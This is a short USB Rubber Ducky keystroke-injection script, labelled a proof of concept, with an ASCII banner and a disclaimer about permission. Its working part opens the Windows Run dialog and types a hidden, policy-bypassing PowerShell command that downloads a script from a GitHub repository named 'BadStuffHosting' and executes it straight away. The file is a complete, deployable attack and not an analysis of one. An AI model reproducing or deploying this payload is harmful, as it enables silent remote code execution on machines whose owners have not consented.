REM Title: RubberDucky_PoC
REM Author: b1g_ph4rm4
REM
REM ______________________________________________________________________________________________
REM 
REM 888      d888                             888          d8888                            d8888  
REM 888     d8888                             888         d8P888                           d8P888  
REM 888       888                             888        d8P 888                          d8P 888  
REM 88888b.   888   .d88b.           88888b.  88888b.   d8P  888  888d888 88888b.d88b.   d8P  888  
REM 888 "88b  888  d88P"88b          888 "88b 888 "88b d88   888  888P"   888 "888 "88b d88   888  
REM 888  888  888  888  888          888  888 888  888 8888888888 888     888  888  888 8888888888 
REM 888 d88P  888  Y88b 888          888 d88P 888  888       888  888     888  888  888       888  
REM 88888P" 8888888 "Y88888 88888888 88888P"  888  888       888  888     888  888  888       888  
REM                     888          888                                                           
REM                Y8b d88P          888                                                           
REM                 "Y88P"           888                                                           
REM ______________________________________________________________________________________________
REM
REM
REM Plug & Play Script
REM
REM This script is made to demonstrate what a rubber ducky can do once plugged into the PC. 
REM Make sure you don't use this script with malevolent intentions and only on systems you have permission to run this onto.
REM The author cannot be held responsible for any bad use of this script
REM ______________________________________________________________________________________________
DELAY 2000
GUI r
DELAY 1000
STRING powershell -w h -NoP -Ep Bypass irm https://raw.githubusercontent.com/Gvte-Kali/BadStuffHosting/refs/heads/main/BadUSB/RubberDucky_PoC/RubberDucky_PoC.ps1 | iex
ENTER
